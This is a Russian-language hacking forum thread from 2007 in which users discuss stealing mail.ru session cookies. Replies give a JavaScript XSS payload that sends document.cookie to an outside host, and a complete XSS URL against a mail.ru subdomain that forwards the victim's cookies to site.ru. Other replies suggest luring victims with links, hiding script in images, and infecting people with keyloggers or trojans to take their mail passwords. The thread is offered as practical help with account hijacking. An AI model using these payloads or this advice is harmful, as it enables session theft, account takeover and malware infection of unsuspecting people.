Снифер античата и mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by cigaretteburn, 21 May 2007.

  1. cigaretteburn

    cigaretteburn New Member

    Joined:
    21 May 2007
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Всем привет. У меня такой вопрос: как с помощью снифера на античате, (http://antichat.ru/cgi-bin/s.jpg) узнать куки на mail.ru ??
     
    1 person likes this.
  2. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Для этого тебе нужна XSS на mail.ru ;)
     
  3. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138

    Если просматривать письмо через Ж то можно украсть сессию. Только как нужно его просматривать я не знаю =(
     
  4. Naf

    Naf New Member

    Joined:
    19 May 2007
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    а что толку от куков? они пароли не дают.
    у меня есть папка с универа (все куки забрал...
    ничего интересного, кроме адресов посещения, жж и блогов.
     
  5. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    снач можешь прочитать вот тут потом можешь посмареть тут а уже потом ...или найти самому активную или пасссиввную...или зайти сюда или сюда и поискать пост с XSS на mail.ru
     
  6. cigaretteburn

    cigaretteburn New Member

    Joined:
    21 May 2007
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Как это толку? в опере меняеш куки и всё..
     
  7. cigaretteburn

    cigaretteburn New Member

    Joined:
    21 May 2007
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    ну точто нужна XSS это понятно, а кто может дать именно код XSS работающий для использования снифа? :)
     
  8. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    просто код вот:
    Code:
    <script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>
    
    естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!
    Но всеже в привате существуют рабочие XSS, но просто так тебе их никто не даст.
    Разве что за $
     
  9. ultimatum

    ultimatum Elder - Старейшина

    Joined:
    28 Apr 2007
    Messages:
    142
    Likes Received:
    65
    Reputations:
    -13
    ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,
     
  10. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Куда бы ты не заманивал пользователя, все равно должен быть xss на целевом сайте (в данном случае mail.ru)
     
  11. cigaretteburn

    cigaretteburn New Member

    Joined:
    21 May 2007
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Ага, ссылка на сни должна быть на mail.ru, например в письме, но почта фильтрует подобные ссылки.. я слышал можно закодировать ссылка со криптом както... это так? кто знает?
     
  12. cigaretteburn

    cigaretteburn New Member

    Joined:
    21 May 2007
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Вот именно что обычный код не пройдёт, система его забанит, вот и создал эту тему чтоб узнать рабочий код XSS под сниф для mail.ru естественно не за деньги.. за деньги можно всё купить.. а вот чтоб своими мозгам.. у меня покачто мозгов для этого нехватает видимо, поэтому и спрашиваю у людей. )) :)
     
  13. cigaretteburn

    cigaretteburn New Member

    Joined:
    21 May 2007
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    А можно обычный код
    Code:
    <script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>
    встроить в gif или jpeg ведь на mail.ru можно к своему аккаунту прикреплять фоты, можно как нить в фотку встроить этот код? а потом написать письмо жертве на ссылку этой картинки, или саму картинку, тогда код будет на целевой системе и всё будет гууд) Вот только можно так сделать?????? :confused:
     
  14. cigaretteburn

    cigaretteburn New Member

    Joined:
    21 May 2007
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    нда... весь прикол в том что выложенные Xss почти все уже не работают..((( :(
     
  15. XHTTP

    XHTTP Elder - Старейшина

    Joined:
    24 Feb 2007
    Messages:
    180
    Likes Received:
    133
    Reputations:
    65
    Неработает одно, работает другое... Нужно мыло Чела? пихни ему кейлогер, узнаешь не только пасс от его мыла...
    Да знаю - легко сказать. И тем немение троян работает!
    Ещё много дебилов, чьи антивиры пропускают старые трояны, вирусы, кейлогеры... В пример могу взять свой университет - стадо тупых носорогов сидящих за компами...
     
  16. cigaretteburn

    cigaretteburn New Member

    Joined:
    21 May 2007
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Хм.. хорошая идея но всё же если кто что может сказать полезного насчёт снифа - пишите. А насчёт кейлогера - дайте ссылку на хороший без лагов, а то их тоже не мало в сети.. А насчёт универа - у меня также вгруппе стадо придурков) ;)
     
  17. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    как не работают??? вот тебе пример...

    Code:
    http://hosting.mail.ru/selectLoginForConstructor.jsp?constructor="><script>navigate('http://site.ru/s.gif?'.concat(document.cookie))</script>
    ///при этом можно открыть гифку ..и вписать туда переадресацию.....чтобы палевно не было...

    Можно встроить в png .... в конец записать ...и в фоту на маил ру ..и то будет работать только в IE ...вот тут почитай
     
  18. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    На мэйле привязка к IP адресу идет...
     
  19. MadFun.

    MadFun. Member

    Joined:
    8 May 2007
    Messages:
    32
    Likes Received:
    28
    Reputations:
    20
    Конечно толку не будет если ты их не попробуешь в свой браузер вбить куки.А может случиться великое чудо ? %) и появиться надпись здраствуйте такой такой то :)))